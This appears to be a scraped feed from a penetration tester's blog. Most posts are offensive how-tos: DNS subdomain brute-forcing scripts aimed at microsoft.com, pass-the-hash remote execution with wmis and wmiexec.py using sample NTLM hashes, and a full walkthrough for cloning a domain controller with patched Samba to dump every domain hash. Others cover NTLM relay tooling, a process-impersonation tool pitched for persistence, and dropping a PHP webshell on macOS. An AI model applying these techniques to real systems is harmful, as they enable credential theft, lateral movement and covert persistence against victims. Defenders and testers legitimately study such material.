Channel: All Posts - Malicious Link - Blog by mubix - Rob Fuller

Iterative DNS Brute Forcing


Everyone has their list of hostnames they brute force domains with. In my last post I even mentioned a few ways to use one with xargs or parallel. But one fact about wordlist brute forcing is that there is no “one list to rule them all”. Over the years of doing DNS record collection I have noticed one thing, though: most domains have a large number of short hostnames that are easy to remember, usually 4 characters or less.

I’m sure you already know where I’m going with this: I wanted to brute force all possible hostnames up to 4 characters. For a long time I struggled with coding this and couldn’t wrap my head around it. I would come back to it every so often, and finally a few days ago I happened upon a script on gist, https://gist.github.com/petehamilton/4755855, that suited my needs perfectly.

I modified it to suit my needs (just use the yield method) and here is what I ended up with (remember DNS is case insensitive, so lowercase letters and digits are all the alphabet you need):

Notice: This script doesn’t end; it will keep doing lookups on longer and longer hostnames until you hit CTRL-C.

```ruby
#!/usr/bin/env ruby
#
## Brute code stolen from: https://gist.github.com/petehamilton/4755855
#

@domain = 'microsoft.com'

# Look the candidate up with dig and print anything that comes back with an
# answer section. Always returns false, so the "return p if result?(p)" in
# crack_yielding never fires and the enumeration runs until CTRL-C.
def result?(sub)
  results = %x(dig +noall #{sub}.#{@domain} +answer)
  if results != ""
      puts "============================"
      puts "FOUND: \t#{sub}"
      puts "============================"
      puts "#{results}"
      puts "============================"
  end
  false
end

def crack_yielding(chars)
  crack_yield(chars){ |p|
      return p if result?(p)
  }
end

# Yields every single character first, then recurses so that each deeper
# level yields every string one character longer: a..9, aa..99, aaa..999, ...
def crack_yield(chars)
  chars.each { |c| yield c }
  crack_yield(chars) { |c|
      chars.each do |x|
          yield c + x
      end
  }
end

# DNS is case insensitive, so lowercase letters plus digits are enough
chars = ('a'..'z').to_a
(0..9).each {|x| chars << x.to_s}

crack_yielding(chars)
```

This worked but it was slow, so I sped it up using the methods I talked about in my last post and a quick modification:

I used this:

```ruby
#!/usr/bin/env ruby
#
## Brute code stolen from: https://gist.github.com/petehamilton/4755855
#

# No lookups here: just print the candidate (one per line) so the resolution
# can be farmed out to parallel + dig. Always returns false so the
# enumeration never stops on its own.
def result?(sub)
  puts sub
  false
end

def crack_yielding(chars)
  crack_yield(chars){ |p|
      return p if result?(p)
  }
end

# Same recursive yielder as before: a..9, then aa..99, then aaa..999, ...
def crack_yield(chars)
  chars.each { |c| yield c }
  crack_yield(chars) { |c|
      chars.each do |x|
          yield c + x
      end
  }
end

chars = ('a'..'z').to_a
(0..9).each {|x| chars << x.to_s}

crack_yielding(chars)
```

which just prints all the possibilities:

```
a
b
c
d
e
f
...
```

and piped it into parallel + dig:

```bash
ruby brutelist.rb | parallel -j100 dig +noall {}.microsoft.com +answer
```

and got the following:

```
c.microsoft.com.               2     IN  CNAME  c.microsoft.akadns.net.
c.microsoft.akadns.net.        499   IN  A      65.55.58.184
e.microsoft.com.               3599  IN  A      191.234.1.50
g.microsoft.com.               2798  IN  CNAME  g.msn.com.
g.msn.com.                     99    IN  CNAME  g.msn.com.nsatc.net.
g.msn.com.nsatc.net.           148   IN  A      131.253.34.154
i.microsoft.com.               779   IN  CNAME  i.toggle.www.ms.akadns.net.
i.toggle.www.ms.akadns.net.    44    IN  CNAME  i.g.www.ms.akadns.net.
i.g.www.ms.akadns.net.         225   IN  CNAME  i.microsoft.com.edgesuite.net.
i.microsoft.com.edgesuite.net. 116   IN  CNAME  a1475.g.akamai.net.
a1475.g.akamai.net.            16    IN  A      23.45.65.26
a1475.g.akamai.net.            16    IN  A      23.45.65.33
m.microsoft.com.               3599  IN  CNAME  origin.mobile.ms.akadns.net.
origin.mobile.ms.akadns.net.   299   IN  A      65.55.186.235
s.microsoft.com.               3599  IN  CNAME  reroute.microsoft.com.
reroute.microsoft.com.         3599  IN  A      65.55.58.201
reroute.microsoft.com.         3599  IN  A      64.4.11.37
cs.microsoft.com.              81    IN  CNAME  wedcs.trafficmanager.net.
wedcs.trafficmanager.net.      7     IN  CNAME  wedcseus.cloudapp.net.
wedcseus.cloudapp.net.         8     IN  A      137.116.48.250
...
```

Happy bruting. Both scripts can be found on my gists page:
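The same idea, written out as an added example in Python rather than the post’s Ruby script (this is not the author’s code). It generates every label of length 1..max_len over [a-z0-9] in the same length-major order the recursive yielder produces, resolves each one through a pluggable resolver so the logic can be exercised offline, and adds one check the post does not make: it probes random long labels first, so a wildcard record for the domain does not turn every candidate into a false hit. The default target name, batch size and thread count are placeholders.

```python
#!/usr/bin/env python3
"""Iterative short-hostname brute force (added example, not the post's script)."""
import itertools
import random
import socket
import string
from concurrent.futures import ThreadPoolExecutor

# DNS names are case-insensitive, so lowercase letters and digits cover everything.
ALPHABET = string.ascii_lowercase + string.digits


def candidate_labels(max_len, alphabet=ALPHABET):
    """Yield 'a'..'9', then 'aa'..'99', ... up to max_len characters (36 + 36^2 + ... names)."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            yield "".join(combo)


def chunked(iterable, size):
    """Split a (possibly huge) iterable into lists of at most `size` items."""
    it = iter(iterable)
    while True:
        chunk = list(itertools.islice(it, size))
        if not chunk:
            return
        yield chunk


def system_resolver(fqdn):
    """Resolve with the OS resolver; sorted list of addresses, [] on NXDOMAIN or error."""
    try:
        infos = socket.getaddrinfo(fqdn, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def wildcard_addresses(domain, resolver, probes=2):
    """Addresses returned for random 20-character labels; non-empty means a wildcard record."""
    found = set()
    for _ in range(probes):
        label = "".join(random.choice(ALPHABET) for _ in range(20))
        found.update(resolver(f"{label}.{domain}"))
    return found


def brute_force(domain, max_len=4, resolver=system_resolver, workers=100, batch=10_000):
    """Return {label: [addresses]} for every candidate that resolves to something other
    than the wildcard answer. Labels are submitted in batches so the 36^4 four-character
    names do not all become futures at once; `workers` mirrors the post's parallel -j100."""
    wildcard = wildcard_addresses(domain, resolver)
    hits = {}

    def probe(label):
        return label, resolver(f"{label}.{domain}")

    with ThreadPoolExecutor(max_workers=workers) as pool:
        for chunk in chunked(candidate_labels(max_len), batch):
            for label, addrs in pool.map(probe, chunk):
                real = [a for a in addrs if a not in wildcard]
                if real:
                    hits[label] = real
    return hits


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "example.com"  # placeholder target
    for label, addrs in brute_force(target, max_len=2).items():
        print(f"{label}.{target}\t{' '.join(addrs)}")
```

Swap `system_resolver` for something that talks to a specific server (or a table, as in the test) when you do not want to go through the box’s own resolver.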


Executing code via SMB / DCOM without PSEXEC


PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:

  1. (Optional) Upload a service executable (PSEXESVC.EXE in the case of the Sysinternals tool) to the ADMIN$ share
  2. Connect to the service control manager on the remote host and create a service based on either a local (to the remote system) executable or the uploaded one.
  3. Start the service
  4. Stop and delete the service and the uploaded file, pulling down the resulting output (if any) from the execution.

Now, as you can guess, the file upload and the creating, starting, stopping and deleting of services generate quite a bit of log and forensic evidence.

As you might imagine, that’s not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Instrumentation). I demonstrated the use of this in the past: HERE and HERE

The downside to using WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t use to be an available option.

That has changed with the “wmis” package on Kali Linux that incorporates the “Pass-the-Hash for 15 years toolkit”

(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)

The other solution is supplied as an example in the Impacket library: “wmiexec.py”. In my experience there are a few features that make it the better option.

  1. Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
  2. It defaults to a “semi-interactive shell” which writes and reads command output through an SMB share (C$ by default, see the usage below). Something I would normally have to do manually with a bunch of tools.
  3. As with the WMIS package, it allows you to just create a process without the share write/read (-nooutput).

Enough crazy talk, here is an example usage of each:

WMIS

Usage:

```
root@wpad:~# wmis
Usage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]
        [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
        [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]
        [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]
        [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]
        [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]
        [--use-security-mechanisms=STRING] [-V|--version]
        //host

Example: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt
```

Example:

```
root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exe
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
[wmi/wmis.c:172:main()] 1: calc.exe
NTSTATUS: NT_STATUS_OK - Success
```

wmiexec.py

The usage shows the password form of the target string; with hashes you just pass -hashes LMHASH:NTHASH instead, as in the example below:

Usage:

```
root@wpad:~/impacket/examples# ./wmiexec.py
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]
                  target [command [command ...]]

positional arguments:
  target                [domain/][username[:password]@]<address>
  command               command to execute at the target. If empty it will
                        launch a semi-interactive shell

optional arguments:
  -h, --help            show this help message and exit
  -share SHARE          share where the output will be grabbed from (default
                        C$)
  -nooutput             whether or not to print the output (no SMB connection
                        created)

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
```

Example:

```
root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 5CCA-B528

 Directory of C:\

07/13/2009  11:20 PM    <DIR>          PerfLogs
10/07/2013  03:26 PM    <DIR>          Program Files
07/14/2009  01:08 AM    <DIR>          Program Files (x86)
04/25/2014  02:21 AM    <DIR>          Users
05/11/2014  03:39 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,884,389,888 bytes free

C:\>
```

Dumping NTDS.dit domain hashes using Samba


So there was this blog post by @lanjelot [definitely someone to follow] talking about a number of ways to dump Windows credentials, here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of that post it says “AD Replication (EXPERIMENTAL)”.

What it boils down to is this: if you can position a system that can do DNS resolution for the target domain and reach the domain controller on the ports a domain join needs, and you have domain admin credentials, you can fake-join a Samba server you control to the domain as a DC and have it replicate the directory. It doesn’t require code execution in any way on the domain controller.

Notice: I am not doing this on a Kali Linux box; there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also require some dependencies to be installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract Samba into there first. Then apply the patch from whatever directory is above src:

```bash
mkdir src
mv samba-4.1.0.tar.gz src/
cd src/
tar zxvf samba-4.1.0.tar.gz
cd /root/
```

So it would look like this:

```
samba-4.1.0_replication-only-patch.txt
src/
src/samba-4.1.0/
```

then run patch -p0 < samba-4.1.0_replication-only-patch.txt and build:

```bash
cd ./src/samba-4.1.0/
./configure
make
make install
```

Prepare the box:

```bash
rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf
```

Next you need to make sure you are resolving correctly (if you can’t resolve the SRV record _ldap._tcp.sittingduck.info, sittingduck.info being the target domain, then this isn’t going to work):

```bash
echo nameserver 192.168.92.37 > /etc/resolv.conf # this is the IP address of the DC
```

Then start the clone:

```bash
/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
```

Looks like this:

```
root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
Finding a writeable DC for domain 'sittingduck.info'
Found DC 2K8DC.sittingduck.info
Password for [SITTINGDUCK\administrator]:
workgroup is SITTINGDUCK
realm is sittingduck.info
Calling bare provision
No IPv6 address will be assigned
Provision OK for domain DN DC=sittingduck,DC=info
Starting replication
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC
```

Then to get the hashes:

```
root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:
```

Or you can do it with password history included:

```
root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::
```

Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus, one of the huge benefits of this method is that once you have the database Samba makes it really easy to query information like group membership or user info after the fact, not just hashes.
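Once the dump is in hand, the first thing worth doing with it is the triage the output above practically begs for: three accounts (Administrator, jdoe, uber) carry the same NT hash, and uber’s history entry still has an LM hash. The following is an added Python example (not the author’s code, not part of Samba or samba-pwdump.py) that parses the pwdump-style user:rid:lmhash:nthash::: lines shown above, tolerates the pdbedit -L -w layout (X-masked hashes, trailing flag and LCT fields), and reports shared hashes and LM leftovers. The sample dump embedded in it is copied from the post’s output.

```python
#!/usr/bin/env python3
"""Triage a pwdump-format hash dump (added example; not part of the post or of Samba)."""
import collections

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password (LM disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Constructed sample in the pwdump layout the post shows; hashes copied from the post.
SAMPLE_DUMP = """\
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::
"""


def parse_pwdump(text):
    """Return a list of (user, rid, lmhash, nthash) tuples; hashes lowercased, '' if absent.
    Works for samba-pwdump.py output and for the first four fields of pdbedit -L -w."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        # pdbedit masks unset hashes with a run of X's; treat those as absent too
        lm = "" if set(lm) <= {"x"} else lm
        nt = "" if set(nt) <= {"x"} else nt
        try:
            rid = int(rid)
        except ValueError:
            rid = -1
        records.append((user, rid, lm, nt))
    return records


def shared_nt_hashes(records, include_history=False):
    """Map each NT hash used by more than one account to the sorted list of those accounts.
    Password-history rows (user_historyN) are skipped unless include_history is set,
    so a user's own old password does not count as 'sharing'."""
    by_hash = collections.defaultdict(set)
    for user, _rid, _lm, nt in records:
        if not nt or nt == EMPTY_NT:
            continue
        if not include_history and "_history" in user:
            continue
        by_hash[nt].add(user)
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def accounts_with_lm(records):
    """Accounts (current or history rows) that still store a real LM hash,
    which cracks far faster than the NT hash."""
    return sorted(user for user, _rid, lm, _nt in records if lm and lm != EMPTY_LM)


def summarize(text):
    """One-shot report used by the command line below."""
    records = parse_pwdump(text)
    return {
        "accounts": len(records),
        "shared_nt_hashes": shared_nt_hashes(records),
        "lm_hash_present": accounts_with_lm(records),
    }


if __name__ == "__main__":
    import json
    import sys
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMP
    print(json.dumps(summarize(data), indent=2))
```

Run it against the samba-pwdump.py output file (or pipe pdbedit -L -w into it) and the shared-hash map tells you which accounts fall together the moment one password is cracked or passed.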

CCDC Red Teamer's Creed


This is my box. There are many like it, but they are all mine.

My malware is my best friend. It is my life. I must master it as I must master my life.

My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me. I will…

My malware and I know that what counts in this war is not the boxes we pop, the noise of our root dance, nor the cheers coming from the Red Team room. We know that it is the root that counts. We will root…

My malware is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its extensions, its dlls and its exes. I will keep my malware av free and ready, even as I am ready. We will become part of each other. We will…

Before God, I swear this creed. My malware and I are the defenders of my botnet. We are the masters of our enemy. We are the saviors of my shells.

So be it, until victory is the Red Team’s and there is no enemy, but peace!

Installing PyCrypto on OSX Mavericks


Keeping it here for notes and just in case anyone else runs into this same issue.

```bash
brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto
```

If you have a better way please leave a comment below!

Effective NTLM / SMB Relaying


SMB Relay has been around for a long while. I even have a post about using it along with LNK files here: MS08-068 + MS10-046 = Fun until 2018

Here is the problem though. Most of the tools that exploit it either just capture the NTLMv1/NTLMv2 challenge-response (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 that’s much harder to pin down. You have to know who is going to hit your relay server and what other host they might be an admin on. You also have to have a service you want to run on that target.

Current Tools:

“Soft” relay tools:

Now, some would argue that you just spin up the relay at a target then leave it until one pops. I’m not really a fan of that. You will not only be creating multiple access-attempt log entries, but you are also throwing away all of the other user authentication attempts. There are 3 tools that agree with me.

  1. Squirtle
    • Squirtle is awesome, plus it’s written in a language I understand (Ruby), but it has one serious downfall: many of the post-auth features are left up to the user to develop. It does have a great API but needs some coding to do certain things.
  2. Intercepter-NG
    • I have tested Intercepter-NG out a lot and it has some fantastic features, not to mention that it does relaying on a Windows host, which is impressive all by itself (Windows binds port 445 itself by default, so a relay tool has to work around that). My only problem with it is that it’s closed source. But definitely recommended.

The 3rd is a tool called “ZackAttack” by Zack Fasel; you can find it here on Github: ZackAttack. You can find the video of the talk releasing this tool on YouTube. So what is so special about this tool? Other than the fact that most of the web interface is horribly broken, it has this amazing bit of code that acts as a SOCKS proxy. This SOCKS proxy identifies SMB or HTTP traffic that has NTLM authentication going on and rewrites it based on captured sessions.

What does this mean? If I use SpiderLabs’ Responder, for instance, to spoof/trick a bunch of users into connecting (by automatic or forced methods) to the capture/keep services that ZackAttack spins up on my machine, I can then run smbclient, Outlook or a web browser, push it through the ZackAttack SOCKS proxy, pick a username out of the captured names, and use any password I want when asked; the SOCKS proxy automatically replaces it en route with the valid session information.

This way I can use every authentication that comes in to its highest potential for pwnage. The video below shows how this can be used to connect to a “Network share”.

Update: One thing to mention that ZackAttack does that I haven’t seen other tools do, even Squirtle or Intercepter-NG, is getting 3+ successful authentications out of a single relay from a user. ZackAttack does this with some clever HTTP Keep-Alive and SMB “reauth” kung fu.

Other References:

I tried finding all the original/semi-original references about SMB (LM/NTLM) relaying. If you have others please leave a comment below so I can add them to the list.

Go home InfoSec, you're drunk


Let me start off by saying this post is easy for me to write in one facet as I’ve never been a heavy drinker or much enjoyed the taste of alcohol. So if you need a reason to disregard what I say next, I leave the door open.

I am still pretty much a runt in the infosec community as I didn’t even begin learning computers (outside of playing games on them) until 2005. However, one thing that has nagged at me for a long time is the intertwined nature of hacking/infosec and drinking. It’s almost a rite of passage in the common fraternity style. The problem lies in the fact that you don’t really “graduate” and leave those parties behind.

Now, I have certainly partaken in my share of parties and consumption, even with that nagging feeling in the back of my head. It didn’t really take root until just recently. I was at a conference where a student (who was not 21) that looked very much like an older version of my oldest child said that he was going to skip dinner to go get wasted with XYZ “Infosec Rockstar”.

That scared me into thinking that if my son goes into Infosec he will be basically expected to drink like an alcoholic. How can I want my kid to be expected (not forced) to drink a shot on stage if he gets accepted to speak at DEF CON.

We (the infosec community) are few, and we lose too many to idiotic things like drug overdoses, drinking and driving, and other stupidly preventable crap. For that reason I actually don’t want to share the thing I feel so passionate about with my own kids.

My call to action is this:

If you are a conference goer, try going one con completely dry, and if you already do, maybe ask a friend to join you.

If you are a speaker, enough of the drinks on stage and drinking games. Do you really want the next generation, those you are trying to teach, to remember that part of your talk instead of the rest?

If you are a conference organizer, maybe a completely dry day at the con? Or an AA meeting space?

If you are a podcaster and you drink during the cast, make it about the taste and selection, instead of how wasted and totally useless the next hour of your listeners’ lives will be.

ShmooCon runs an AA meeting at the con

Let’s stop losing our friends and family because we are too weak to say ‘no thank you’ when someone approaches the dais with a shot.

Why good leaders make you feel safe


This talk really touched home with me and I wanted to share it, and not just because he talked about Marines. ;–)

Forward this talk on to your fellow employees, boss, etc.


The Internet's Own Boy


Anyone who knows me knows that I live in a tiny world of offensive security, so much so that I miss large world events entirely (like elections and hurricanes).

I didn’t know Aaron Swartz, or even 1% of what he was doing in the world to make it a better place and for that I am ashamed. I will do better, to look around, see what needs to be changed in this world and make it a reality.

The following is a documentary about the life of Aaron Swartz. If you live under a similar rock to mine, you can start here: http://en.wikipedia.org/wiki/Aaron_Swartz

Watch, learn, share, and help continue a legacy that Aaron started.

Milkman: Creating processes as any currently logged in user


One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What’s the problem with that? Isn’t SYSTEM god mode? Yeah, and normally I’d agree that it’s the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn’t get the logged-in user’s proxy settings.

Here is a blog post that I made about setting the proxies for SYSTEM, but leaving settings like this set is not only sloppy but hard to clean up.

Along comes RunAsCurrentUser-2.0.3.1.exe. I found this gem by messing up a Google search for RunAsUser; it turned up in this IBM support post.

Link to direct download: http://software.bigfix.com/download/bes/util/RunAsCurrentUser-2.0.3.1.exe

Here is a mirror uploaded to my Post Exploitation repo: https://github.com/mubix/post-exploitation/blob/master/win32bins/RunAsCurrentUser-2.0.3.1.exe

This binary takes a path to another executable as an argument. It then finds the currently logged in user and starts the provided executable as that user. AWESOME! This basically solves the whole PSEXEC->SYSTEM no-proxy settings issue. And it’s created by a legitimate company for legitimate reasons? w00tw00t. Game on!

Only two problems:

  1. It is 335K, which doesn’t seem like much, but over high latency links that can take an eternity to transfer, especially over doubly encrypted channels like a reverse_https meterpreter session.

  2. It takes an argument, which normally isn’t a huge challenge, but in our specific use case (the psexec modules in Metasploit) it isn’t something we can do easily. You would have to upload your C2 binary as well as the 335K RunAsCurrentUser over to the target host, then run the psexec_command module to execute them both, one as the argument of the other. Kinda sloppy.

So I set out to figure out how this binary did its magic. As I’m not much of a reverse engineer I uploaded it to VirusTotal so I could take a look at its insides (plus, double-check whether it was being detected as malicious at all).

As far as I can tell the important pieces are the Windows API calls ImpersonateLoggedOnUser and CreateProcessAsUserA. I set to trying to reproduce what it did in AutoIt (awesome stuff if you have never checked it out). I couldn’t quite get the API calls right, so I decided to give C++ a shot. Turned out to be pretty simple. I present to you “Milkman”:

https://gist.github.com/mubix/5d0cacdabfe092922fa3 (full source included below)

This program (once compiled) takes one argument (or none at all) and, for every instance of the process you name, runs calc.exe as the user that owns that process. If you run it without arguments it auto-selects explorer.exe. So if you create a service:

```
C:\temp\>sc create SuperService binpath= C:\Temp\milkman.exe type= own start= auto
[SC] CreateService SUCCESS
```

It will start up every time the computer starts, which is completely useless, since there won’t be any users logged in at that point, but you get where this can go. Features to add at this point are:

  1. Create a service binary that responds to START/STOP/PAUSE commands and such so that running this as a persistence method would actually be useful.
  2. Add a loop so that it continues to run checking for explorer.exe every so often so it can catch when someone is logged in.
  3. Finally the obvious one is to change it from being calc.exe that it runs by accepting another argument or some other kind of config option.

Thoughts? What would you like Milkman to do, or what use case do you think a tweak would make it work better for? Leave a comment below.

OSX Persistence via PHP Webshell


As I learn more and more about OSX I find things that surprise me. For instance, in this post I will be showing you how to, with root or sudo privilege, enable the built-in Apache server on OSX and its PHP module…

I am working with OSX Mavericks, so your locations may vary based on the version of OSX your target is running.

First things first is to enable the PHP module for the Apache server.

```bash
sudo nano -w /etc/apache2/httpd.conf
```

(vi or emacs to your heart’s content.) What we are looking for is to uncomment the following line:

```
#LoadModule php5_module libexec/apache2/libphp5.so
```

Once you do that, start up Apache. This can be done temporarily (won’t survive a reboot) with the apachectl command:

```bash
sudo apachectl start
```

Or you can make it more permanent with launchctl:

```bash
sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
```

And undoing the damage with:

```bash
sudo launchctl unload -w /System/Library/LaunchDaemons/org.apache.httpd.plist
```

After that, just drop your favorite PHP shell into the /Library/WebServer/Documents/ directory and you’re done. (My favorites are b374k and PHP Meterpreter.)

Full Disclosure - SingleClick Connect


Update: I originally posted this to the Full Disclosure mailing list but for some reason it wasn’t accepted via the moderator so I’m posting it here. First, so that the information does get out there, and second to see if anyone knows why it may have been rejected.

I was helping out a family member with their computer when it came up that they “already had remote help software” (SingleClickConnect or SCC). When I asked what this was, the family member said it was installed by Dell Support when trying to fix their issue. This was in 2008. I removed it and helped fix the issue.

In 2010 another issue arose on the new computer (Dell again) of the same family member. Again, they had called support first, and support had installed this software.

Disclaimer: I cannot say for certain that it was Dell’s support rep, or even that it was them that installed it, but if Dell is using this as a means of support they should probably cease for the following reasons:

Apache (port 40080, listening on 0.0.0.0), MySQL (port 17771, listening on 127.0.0.1), PHP, and UltraVNC (port 5900) are installed as part of the software package.

ISSUE #1

Without decoding the ionCube “copyright protecting” software, a large number of XSS, CSRF, and SQLi vulnerabilities were found, all unauthenticated, in the web app that runs there.

No specifics are being posted on these vulnerabilities as I assume the site on the net (the company’s site), where a registered user would log in, has the same ones as the locally hosted app (at least the app looks the same and has a similar page structure).

ISSUE #2

MySQL’s root password is blank and there are two other default accounts as well, allowing easy privilege escalation to SYSTEM (via the SCC local account, see ISSUE #5):

dsl *7E1CA3417E3A159A9188657F44C7034A8E9FDFF2
tera *B2744A6BC5E8B1667BE5AED0111A2B941356E4A4

^ uncracked at this point. For all I know they could be randomized at install.

ISSUE #3

Another service, which I haven’t been able to identify, listens on 0.0.0.0 on port 17667; when you connect to the socket it starts listing users, services, printers and interfaces (and that is without sending any data to it).

$ ncat 172.16.102.149 17667
8�TXPBASELINEXP_BASEP�RAdministratorGuestHelpAssistantSingleClick
AdminSUPPORT_388945a0!aCACAMD PCNET Family PCI Ethernet Adapter -
Packet Scheduler Miniport{47F69AAC-AE9A-40A9-88F5-A246A169CE92}�f�
)�n�����f�f��fDownloadsC:\Documents and Settings\Administrator\My
Documents\DownloadsMicrosoft XPS Document
